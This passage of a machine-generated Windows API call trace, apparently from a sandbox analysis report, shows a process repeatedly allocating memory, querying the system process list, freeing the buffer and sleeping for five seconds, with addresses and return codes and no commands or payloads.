RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.125] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.137] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.138] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.138] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.139] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.142] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.142] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.152] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.152] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.153] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.153] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.153] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.155] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.156] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.169] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.169] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.169] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.170] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.172] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.172] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.184] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.184] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.184] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.185] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.187] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.187] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.199] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.199] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.200] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.200] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.200] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.202] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.203] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.215] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.215] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.216] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.216] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.216] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.218] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.218] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.230] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.231] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.231] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.231] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.232] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.234] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.234] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.246] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.246] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.247] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.247] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.247] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.249] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.250] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.262] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.263] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.263] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.263] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.266] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.266] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.278] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.279] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.279] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.280] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.282] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.283] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.310] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.312] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.313] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.313] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.315] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.316] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.324] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.325] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.325] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.325] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.327] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.328] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.340] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.340] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.341] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.341] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.341] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.343] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.344] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.355] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.356] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.356] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.357] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.357] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.360] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.360] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.371] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.372] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.372] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.372] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.374] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.375] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.387] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.388] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.388] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.388] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.389] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.391] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.391] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.402] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.403] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.404] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.404] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.404] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.406] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.407] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.418] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.418] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.418] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.419] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.419] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.421] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.422] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.433] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.434] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.434] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.434] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.435] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.437] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.437] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.449] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.450] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.451] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.452] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.452] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.455] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.455] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.464] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.465] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.466] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.466] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.466] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.468] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.469] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.480] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: 